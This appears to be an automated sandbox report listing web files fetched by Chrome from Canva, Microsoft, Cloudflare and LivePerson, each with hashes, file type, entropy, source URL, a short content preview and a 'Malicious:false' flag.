                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:551A5D1B5EBF715E3F78C311A57FA1D7
                                                                                                                                                              SHA1:29EF719E00736BCFED725EC095ACA14578891F1B
                                                                                                                                                              SHA-256:E1831970A3626C40DCAC24CAA7D40A342D02CF450942657456EDDF123D4A6289
                                                                                                                                                              SHA-512:3ED0957342D84997D937CF36353D90CF05C9CA44EA16D13FC1D86FDA33585D1D614DB4CE27DC936575E8A4C247CC241D4CE7EDB6E37947020E4EE65761ACFE80
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:'use strict';(function(f,b){const e=["data-marketlayer-submarket","data-marketlayer-content","data-marketlayer-selector","data-marketlayer-position"];let h=b('[data-mount\x3d"market-selector"] select'),r=b('meta[name\x3d"marketLayerOverride"]:not([data-marketlayer-submarket])'),t=b('meta[name\x3d"marketLayerOverride"][data-marketlayer-submarket]'),g=[];const l=c=>{let a=[];t.each(function(){if(b(this).attr(e[0])==c){var d={content:b(this).attr(e[1]),selector:b(this).attr(e[2])+":not([meta])",position:b(this).attr(e[3])};.a.push(d);console.log(d)}});r.each(function(){let d=b(this).attr(e[1]),n=b(this).attr(e[2])+":not([meta])",p=b(this).attr(e[3]),q=!1;for(let k=0;k<a.length;k++)if(n==a[k].selector&&p==a[k].position){q=!0;break}q||a.push({content:d,selector:n,position:p})});console.log(a);return a},m=c=>{c.forEach(a=>{if("append"===a.position)b(a.selector).after(a.content),g.push({element:b(a.selector).next(),action:"remove",content:""});else if("prepend"===a.position)b(a.selector).befo
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):43
                                                                                                                                                              Entropy (8bit):2.7374910194847146
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                              SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                              SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                              SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (8786), with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):8786
                                                                                                                                                              Entropy (8bit):5.7391015318527865
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:C77DEDE7F95A2233531DB328DE2D31A2
                                                                                                                                                              SHA1:D331EA8A014EB1DE562E46A847881E494F310404
                                                                                                                                                              SHA-256:ED4D069B9428700056D070D5DEF263DDE91DC8805FBEA5FD82989CD0CC31D046
                                                                                                                                                              SHA-512:0BA01F4F540F1E949B15E283D69661E99DAD04520931090E64E8ABC7109049E618A8B0BBDE590BE99ACAB948D4D3BC509A7C1ECFF1CE88D2CDBAF7ED063BFADC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.canva.com/cdn-cgi/challenge-platform/h/g/scripts/jsd/f9063374b04d/main.js?
                                                                                                                                                              Preview:window._cf_chl_opt={cFPWv:'g'};~function(W,h,i,j,k,o,s,x){W=b,function(d,e,V,f,g){for(V=b,f=d();!![];)try{if(g=-parseInt(V(444))/1+-parseInt(V(551))/2+parseInt(V(503))/3*(parseInt(V(489))/4)+-parseInt(V(543))/5+-parseInt(V(467))/6*(-parseInt(V(525))/7)+parseInt(V(511))/8*(parseInt(V(442))/9)+-parseInt(V(449))/10*(parseInt(V(483))/11),e===g)break;else f.push(f.shift())}catch(E){f.push(f.shift())}}(a,514355),h=this||self,i=h[W(527)],j={},j[W(456)]='o',j[W(535)]='s',j[W(530)]='u',j[W(470)]='z',j[W(540)]='n',j[W(432)]='I',j[W(452)]='b',k=j,h[W(443)]=function(g,E,F,G,a1,I,J,K,L,M,N){if(a1=W,E===null||E===void 0)return G;for(I=n(E),g[a1(538)][a1(445)]&&(I=I[a1(438)](g[a1(538)][a1(445)](E))),I=g[a1(473)][a1(499)]&&g[a1(514)]?g[a1(473)][a1(499)](new g[(a1(514))](I)):function(O,a2,P){for(a2=a1,O[a2(515)](),P=0;P<O[a2(536)];O[P]===O[P+1]?O[a2(446)](P+1,1):P+=1);return O}(I),J='nAsAaAb'.split('A'),J=J[a1(502)][a1(485)](J),K=0;K<I[a1(536)];L=I[K],M=m(g,E,L),J(M)?(N='s'===M&&!g[a1(450)](E[L]),a1(43
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):152466
                                                                                                                                                              Entropy (8bit):7.998349841039217
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:004E01F8CC1BC6AE4E7EC491853EABE0
                                                                                                                                                              SHA1:BE4DC93C222BA6CCCD0EA8490276056FBB1D41EA
                                                                                                                                                              SHA-256:59BBCEB3893FBA540AB86E1D5DF41F74B5EE71FB2759A4A9FB45BFDA56F34209
                                                                                                                                                              SHA-512:5995E005A19848E6446FF66556E50DBDC36A4957D9A4CC1F1775DEC565AA05CD31244C7F74FA2B5F530D27A2F337920C2F09BEB1F0281826BFBDAF0C4C1F0A4E
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/372488-accordion-powerbi-desktop?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1999&qlt=96&fmt=png-alpha&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............Rx...(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma.................R.mdat.....*..%....B2..D.......;.<T...".x.....A...m..b...:....*@C.z..M:F"e..H....s..4J.1.....z.9[o...4EBQUx..1G..^..^i;..i]..4..bo....C.&.I...m.TdR...:1h......y..`.2.v..~......P$...b....8..a#...^.j3....$f........dC..@A.....0.uBZ....0..#.d.`m,.,.(.....] ..2.{.a;..[./.B....&~........dUMs.]....:{...cA..j..m.>~..Z.O=....'...&..Xr..$V...5.u...W.....<....0..y...;.o.........9('.y....J.p..j..wSPEA....yM....Lg.f...7.r....V..k/,(!.[.Ep.+W.;...0>.?./...*....RR...*Uq...M.....P......FK.h..XX......qZ.=...Qc.Q8v......Up.ta.m.-\...}...5..))4....NCz].qA..u...h~.u.......B..i*T/.K......+YAp..&V.......#^X..w.....%...+.j....?...Lq..x.<.2*.A.....d..G@......S. .6?).......0Z._.s...MK._.. ....n....i>....=.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):131502
                                                                                                                                                              Entropy (8bit):7.997585856106481
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:0EA0BA8CA8F90CE0F9735F1EDDC87DA6
                                                                                                                                                              SHA1:262DA9DB90710D289478CC77677165C07B05424F
                                                                                                                                                              SHA-256:D4E6C4E1F95EB7B03458A075DCB3AA00E925B7786D88B68684F257B33B3C5A7D
                                                                                                                                                              SHA-512:7AFA6939A464C5E85259E909421ECB6D651A574203F1FD11F4E610C124864819DF8153C611E2B81048B370BEA4E3DCF8B1119FC62761816859793CB94F9AE0A0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF....WEBPVP8 .........*..&.>...A......Q--.z.E.W..5...8..K......`......x..?...O............C..?....g....^./.......I...?..d.+......O.U.}..._.?+..._......O..y.........U.........#>..l.Q.K......._..............W.o.^....l.o.......k..._.?..f...p.i..._.........>.?...~R.....o.O.w.o.../...>.?...~F...............?......M..._..............o...................G..........A.....3./....s...;.g........-./.......g.......x.h....C....q...P.../...?....I.......?^..~..+.............?...o....`...w.....?.....{%......................../.o..............1..........?.?...H...+..._...>..;.W....'........s....................G.../.?..{.3....._.. .-...K.......?......%....._......Y.....3...7....................?.b..qPTDn[.......p...Ng..TDn[.....@......#r.........0.F...-.(A..T."..D4u\..._..((."<`... .L?...r....B~..<.%mP.].=W....04.0bOg..\C.&S..q....'.J.:M..z..M.6....U%...y_.1z.Mt.m..jk....q.......)s!......$..cQ*.&..p..Y..-er...0..l.B~.ndDq...2T....A..(.....'.v|....f.wj...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):424
                                                                                                                                                              Entropy (8bit):4.933461267592602
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:C7B06D2C5A8D4232A7AABCA94811C468
                                                                                                                                                              SHA1:5198A33544ADCB248C44BBA46A0B0F199EBB773A
                                                                                                                                                              SHA-256:BD49A09567E62361A0B461C615A7EA2BC991C3DB540B95540C527B2FCBBE79FA
                                                                                                                                                              SHA-512:A198F51C6BE738D50FF3F7A10E17380AC152967EFC104D88150C3D652267357863E8E343AF7C833A49A358858E42D64BAA4391C1DEE73132945AC0224784BDFB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<g opacity="0.75">.<path d="M23.166 21V22.5H2.91602L2.16602 21.75V1.5H3.66602V21H23.166Z" fill="#0078D4"/>.</g>.<path d="M23.166 7.14669V9.26919L20.0415 6.14919L12.2415 13.9492H11.178L8.37452 11.1442L3.66602 15.8512V13.7302L7.84352 9.55269H8.90402L11.7075 12.3547L19.5075 4.55469H20.568L23.166 7.14669Z" fill="#0078D4"/>.</svg>.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):39
                                                                                                                                                              Entropy (8bit):4.2504143220263435
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:D66C468F4CA17E83CCD97A4518B3E814
                                                                                                                                                              SHA1:2E657440F653DA65E699AC9230D82FAEE414D8A5
                                                                                                                                                              SHA-256:8E1CE663720F6AFB2DEE29B587D3F7559EA89BC622F966120C9F108172A5C866
                                                                                                                                                              SHA-512:FC012A375F871892839D547D3FB3D38B58C2542B0F32FB005A7CADCA7ECD676D1626F3CE79E2DD24890B02162EF7C2B8A877049CE7865B9B83C7FFDA9C40FBBF
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine-page/clientlib-aem-styles.min.ACSHASHd66c468f4ca17e83ccd97a4518b3e814.css
                                                                                                                                                              Preview:.xf-content-height{margin:0 !important}
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):138786
                                                                                                                                                              Entropy (8bit):7.997959757434076
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:F32AF92B732CA4AC4CC810F88A48F5E5
                                                                                                                                                              SHA1:966824CC79CA04C5052E5FB9F84A059EC95F7E4D
                                                                                                                                                              SHA-256:7B00E6CD1021DE6AA742FA4341A771BBC0540F19EE631C9E93516BF8B59B169E
                                                                                                                                                              SHA-512:76C1CF0451387728F15B325E7AD770F2DC2120625AD27EC8597B4188A7C0333E69999ABC692D7B4D3BC1E6EB6CBCF3F2B73A9A40CB5F17205AA028284FC18043
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF....WEBPVP8 .....V...*..&.>...A.;....v..[.^......(.....=.5_w.3.L....^.]q...qoK/.9....h.............K.{...........8.o$.G...O........O...._.e...[.."...w..._.?..}........o.....?5.[.....1.[..............U.....o......-..............=..Y.......o............I.s........`?....N..}....5....................A...2.i.....g.........[.....O......$.{...'.'.../.~.........._.=..G....u.'.....?..{.....K................_.?..\...[.........................../.............C.M....!.....7....i...../..........S.k..._.?...~......-...g._.?.?....o....%o....+...K._.O.......g.....O...?..............4~c...W.....?....W...;.......e........'...O...........~.......-..8.W.....Z.Dm{]..+,...+GB.....J....k..X.2#..J... ...N.>.2p.}...W....S.sV...)....o.z..e..G.........C..og.[...x...])..H~....9KO.....&..U.).S.V."f....(./..zOo.X'.,*.-lz..e..G........v.!.S.qEV.V....#...;..r....:t...g..A..N.X.......h...HzE.@.8.zj;c....-..8.W.....R.....u.4:...vyV.%0.h.bX.s...u.)Q.$..-=d.CF.3...XU.>..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):159416
                                                                                                                                                              Entropy (8bit):7.99804870523972
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:03C8E5CBE65EE1BAB85A7D2DB570C1D2
                                                                                                                                                              SHA1:24EBA10341E8BC01EBEE59D8B37F2A2EB6E85269
                                                                                                                                                              SHA-256:54D446B2CEA84924D7BE4D8F10D844B853683D181F805AF09D253A0A37BD68F1
                                                                                                                                                              SHA-512:F18D0DF87208E759D9133DD639A276A1EA1ACB0F8B1913E78F1151DC84B434CE6D59647C0F27C174209E10A145F4E82E4794B8902380831A7F83CC8729DB3421
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF.n..WEBPVP8 .n..0....*..&.>...A..ba7..a,..<.....>qX..<..W.5p.I....C.....i7..K.!.....h.~G.o./........;.3./..0............../.].|.._._..{,y........i.?.........~......C.O......?....3.[........k...m............?......Y...../.............U.........?..5...........g.........<>....D.e.....................9.O.O..................o...................,..?...._.m.......?.?..1...g...'.7.P.Y...O.....?.{s.g.?+...?.......~....'...._...Oq...2.../.?.?....;.'...?...........?[?........_.......U..........m.Q......q.Q...........e.........~.....P.......?..r.D.......O.O......^...S...?...}s{l}[...?..._........?.3.'..........T........?....Y.s..?......)......./...?..`.../.O....m.../.......................(..eC!.*7... %F.c....W..}M....'tV..@......b.~.i....?Q{*.......:.....Q.OLzz..N.6..6.[.B...-M..\.B.Tn..8@J..|...Q.FU..#m1a.o....S.{S....._.B..J.\.........v...#..y..|f~..=.....r.8@J..|...Q./............B0..s...0..u...m~6.4.z..Q&....V....g..6-.Xn..~.w.K&#.\Z..=.>.....|..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (1818)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):185145
                                                                                                                                                              Entropy (8bit):5.263515273204495
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:8F54371F05BC32A5CBCF5D92B52B9432
                                                                                                                                                              SHA1:E48D06AB8E24219379EB8936C15CCA6DACB68BB3
                                                                                                                                                              SHA-256:977046592B00D4B3569B963B568C06C557E58E9BD806D2D68A37E9561E2114C5
                                                                                                                                                              SHA-512:D423C6B105B776AC7CB213841EC5B5B97D42A3E13F848A28AC8BBD88847C07ABF44F7D3B8ABEB01E8D32FA5667336C6F4199E715CB33EF32A0CF75DF1F963F68
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://publisher.liveperson.net/iframe-le-tag/iframe-cs.html?lpsite=60270350&lpsection=powerplatform-presales-en-us&buttons=lpPowerPlatform
                                                                                                                                                              Preview:<!DOCTYPE html>.<html lang='en'>.<head> ..<title>iFrame Cart Page</title>..<meta charset='utf-8'>..<meta http-equiv='X-UA-Compatible' content='IE=edge,chrome=1'>..<meta name="format-detection" content="telephone=no"/>....<meta name='viewport' content='width=device-width, height=device-height, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no'/>...<style>.../*Empty MR3*/...body {....background-image:url('https://lpcdn.lpsnmedia.net/le_unified_window/9.12.0.19-release_4769/resources/loader_on_warmGray5_75.gif');....background-repeat: no-repeat;....background-attachment: fixed;....background-position: center;....background-color: #f2f2f2;....margin: 0;...}....@font-face {....font-family: "Segoe UI";....src: url("https://c.s-microsoft.com/static/fonts/segoe-ui/west-european/normal/latest.woff2") format('woff');...}......* {....font-family: "Segoe UI", Arial, sans-serif !important;...}....body #lpChat .lp_dialog_container .lp_buttons_area .lp_confirm_button {....colo
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1461
                                                                                                                                                              Entropy (8bit):3.925845757428167
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:941CD01A5516FC5B93A3A1E8D640DC76
                                                                                                                                                              SHA1:28B1E868EB21E63572002ECE6E9778A20E415918
                                                                                                                                                              SHA-256:C3483E48D6B1348A8C16FA0D56AC7397E993F53FF42EB813BE1A921357155453
                                                                                                                                                              SHA-512:7AE3FE12231053C5BD0F03C2212659BDFE331535AE6CB3040C0640C950A3531267C9E70A307A058D449882833B397E3C2D6B48979984AC55700781BE8FAB70CB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:<svg width="64" height="64" viewBox="0 0 64 64" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M20.6667 34.6667C22.5076 34.6667 24 33.1743 24 31.3333C24 29.4924 22.5076 28 20.6667 28C18.8257 28 17.3333 29.4924 17.3333 31.3333C17.3333 33.1743 18.8257 34.6667 20.6667 34.6667ZM35.3333 31.3333C35.3333 33.1743 33.841 34.6667 32 34.6667C30.159 34.6667 28.6667 33.1743 28.6667 31.3333C28.6667 29.4924 30.159 28 32 28C33.841 28 35.3333 29.4924 35.3333 31.3333ZM43.3333 34.6667C45.1743 34.6667 46.6667 33.1743 46.6667 31.3333C46.6667 29.4924 45.1743 28 43.3333 28C41.4924 28 40 29.4924 40 31.3333C40 33.1743 41.4924 34.6667 43.3333 34.6667ZM24 42C24 43.841 22.5076 45.3333 20.6667 45.3333C18.8257 45.3333 17.3333 43.841 17.3333 42C17.3333 40.159 18.8257 38.6667 20.6667 38.6667C22.5076 38.6667 24 40.159 24 42ZM32 45.3333C33.841 45.3333 35.3333 43.841 35.3333 42C35.3333 40.159 33.841 38.6667 32 38.6667C30.159 38.6667 28.6667 40.159 28.6667 42C28.6667 43.841 30.159 45.3333 32 45.3333ZM8 16.3333C
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (21576), with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):21576
                                                                                                                                                              Entropy (8bit):4.929076929051309
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:7342360B143714D6D075551721AB7C2C
                                                                                                                                                              SHA1:F814CE0526D55CFCC58D36DD5F311B0D46917F48
                                                                                                                                                              SHA-256:331AF168FC4B98C4E2C091712C3DDE4CEC15B18E193FDF0965434340766D8355
                                                                                                                                                              SHA-512:9F7669FC4DEE253DEEFB2E6BCDEBFD9CB52E3F5C1686A3F508C0D77579EE469F1B02C3C8028C547A4EAAA199798C114B3F7644437185D6D668227D1634440B0C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://accdn.lpsnmedia.net/api/account/60270350/configuration/le-campaigns/zones?fields=id&fields=zoneValue&cb=lpZonesStaticCB
                                                                                                                                                              Preview:lpZonesStaticCB([{"id":138781714,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Right Overlay","deleted":false,"zoneType":1,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":27},{"engagementSubType":24},{"engagementSubType":22},{"engagementSubType":26},{"engagementSubType":19},{"engagementSubType":18},{"engagementSubType":17}],"isDeleted":false},{"id":138781814,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Offsite","deleted":false,"zoneType":2,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":30},{"engagementSubType":29},{"engagementSubType":28}],"isDeleted":false},{"id":138781914,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Left Overlay","deleted":false,"zoneType":1,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":21},{"engagementSubType":14},{"engagementSubType":25},{"engagementSubType":20},{"engagementSubType":16},{"engagementSubType":15},{"engag
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1979)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):2287
                                                                                                                                                              Entropy (8bit):5.2296089244273425
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:D631573FB1805FDA9C7668B7F1534161
                                                                                                                                                              SHA1:C0D1D5B810551A163C4F281A4054EC4746CF8D97
                                                                                                                                                              SHA-256:8D00030369DCC69DDE6FEA77A7606D298E6044DC5A014642186855C8423F9DF9
                                                                                                                                                              SHA-512:84EE473C021F7960CE27EB92D332FC020F8E1989F512C9CC1A943A428FD644B1E7343C8B37EAB6EBB81CD94EC89E4897A02270A31C478C8E6CA772DC16060D20
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://static.canva.com/web/143b3cccb450cc5d.strings.js
                                                                                                                                                              Preview:(function() {. const messages = JSON.parse("{\"LE4MeQ\":\"Esc\",\"M50kBA\":\"Previous\",\"yLWiZA\":\"Ctrl\",\"PRfNzQ\":\"The page you intend to visit <strong>({0})</strong> does not exist or is invalid.\",\"mz4S4Q\":\"If this page has been wrongly flagged, <a href=\\\"mailto:trust@canva.com\\\">contact us</a>.\",\"E7JssA\":\"If you do not wish to continue, you can close this tab and return to Canva.\",\"Bx2HpA\":\"Continue to external site\",\"H5sJ6g\":\"<strong>{0}</strong> has been reported as a deceptive website.\",\"7ht4CQ\":\"Close\",\"VSJwUw\":\"(opens in a new tab or window)\",\"guY7ag\":\"We.re having some problems\",\"ocgyVw\":\"Alt\",\"OD1mVA\":\"If it doesn.t seem right, report it.\",\"6dyjdg\":\"Suspicious of this website?\",\"DXHOoA\":\"Go back\",\"1vUiEw\":\"Up\",\"VxF86A\":\"To keep using Canva, get the latest version of the app.\",\"qk+C4A\":\"Warning: Invalid URL\",\"gJDegw\":\"It may trick you into doing something dangerous like installing software, or revealing y
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):308
                                                                                                                                                              Entropy (8bit):4.70981696594715
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:D54C23BA76BD8648119795790AE83779
                                                                                                                                                              SHA1:D8D52ACAEB44EF8D5ED93D3EB65465AEFC8E8EA7
                                                                                                                                                              SHA-256:50F43ABADD35CC811C5C927FA149DD93E18707562D9961D82208B3261E2C1A34
                                                                                                                                                              SHA-512:1844CD63F89AA92C33D9D7E691B1F8DFB55F3195E86FB359719E6E81E82A98C5BBE3889D33C37499768F51DF5A48BF0633254F64E3257572566D444CCFC26FF9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/core/wcm/components/tabs/v1/tabs/clientlibs/site.min.ACSHASHd54c23ba76bd8648119795790ae83779.css
                                                                                                                                                              Preview:.cmp-tabs__tablist{display:flex;flex-wrap:wrap;padding-left:0;list-style:none}..cmp-tabs__tab{box-sizing:border-box;border-bottom:1px solid transparent;padding:.5rem 1rem;cursor:pointer}..cmp-tabs__tab--active{border-color:inherit}..cmp-tabs__tabpanel{display:none}..cmp-tabs__tabpanel--active{display:block}
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (1059)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1278
                                                                                                                                                              Entropy (8bit):4.946235140791672
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:91732975EA7EF23FD7E91572750E8720
                                                                                                                                                              SHA1:6A9BDA86431AC63C887DBD473F398CB698B106AB
                                                                                                                                                              SHA-256:001CD6990C766AF3C2BE26CBD2293636264277F7727DDBCD627CFD684B8C4BE3
                                                                                                                                                              SHA-512:A2CE236C8FC15E02EBC46ECF16295117D70E32C411FFFF40FFBF4A0713DBEFDD15A31F4FFCF3B8A97922D1D4D3DCB6513D299449590FCEF4AB722749413E8AC9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1417],{../***/ 399744:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {__c.pq=new Set("design_create design_first_edited design_open design_opened design_publish editor_template_applied mobile_design_create_enriched new_event_partnership_artwork_created partnership_artwork_created post_publish_dialog_clicked printegration_page_content_selected printegration_page_loaded publish_button_clicked publish_completed publish_endpoint_clicked publish_print_confirm_bleed_continue_clicked publish_print_confirm_order_details_continue_clicked publish_print_funnel_step_selected publish_print_funnel_step_selected_v2 publish_print_margin_check_continue_clicked publish_print_panel_shown publish_print_proof_pdf_download publish_p
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):175767
                                                                                                                                                              Entropy (8bit):7.998643049432972
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:022874A32ABC53CEFD7BFF4E86FEBFCD
                                                                                                                                                              SHA1:A7C55ED96A7DE6B4CA5A43A37CB0F020C3955143
                                                                                                                                                              SHA-256:FBF9EBB00764011658921D36599E5ED6949B6BDB4426E15A82F1020C6E1427C8
                                                                                                                                                              SHA-512:006963975581B97F96B37A57E4DA94574801F2604F70BAFE457421EA72C6B5D8EB86EC500FA789C8C46CD148A6BBA476ED7138F50B3F7649AA5BB90EA0297DC6
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Product%20Overview-B?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................}...(iinf..........infe........av01Color....jiprp...Kipco....ispe...........[....pixi............av1C........colrnclx...........ipma...................mdat.....*.|Z....B2...D ..A.P...zo.I..2Jdk.e......O...FF9.X.........e....u....q..v^g+.,X:.....t{..9.+.D....._\Z.k..-Df.....xJ.....J.7R.,.A...S..#.D3A...:..3..,.!....^..U.W......zx...?..2.<..........xu$.#N..IR.W..v.".[f....B....t....l.K.qy....^D.;.C....1...*..~..)G.j. ..'.|\.....?..^.........=.....r.^..+.Y*~=.d.ZV.D&...ON....A....PV.[r..k..c.G..rA.W....jE...s.yw..`V....1.3...1....d..?p].{........z..g...Yk:@....&B'....!..[...s..f.z..n....c..W.b.}...5<.t7...Yf..>.%.d P..%..0..BL.{a....0..?{.a.]....v.`.@.}...hmy....2..}.B....rA...........;....^.z.u..4a.J..w.'.\w]d.....*c..z..;i..S.!. i.]...l........*V-K.O./.Ku.7.+a./@1..Da.. ...j+.....{)'pS...u.`...z.....f.n.D.......Z//........
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):126230
                                                                                                                                                              Entropy (8bit):7.997953255761436
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:63E775F582D61825C466994A43EB80BF
                                                                                                                                                              SHA1:170950D5CF673A17FD1EF4FB5CDFBA15CA49CCA8
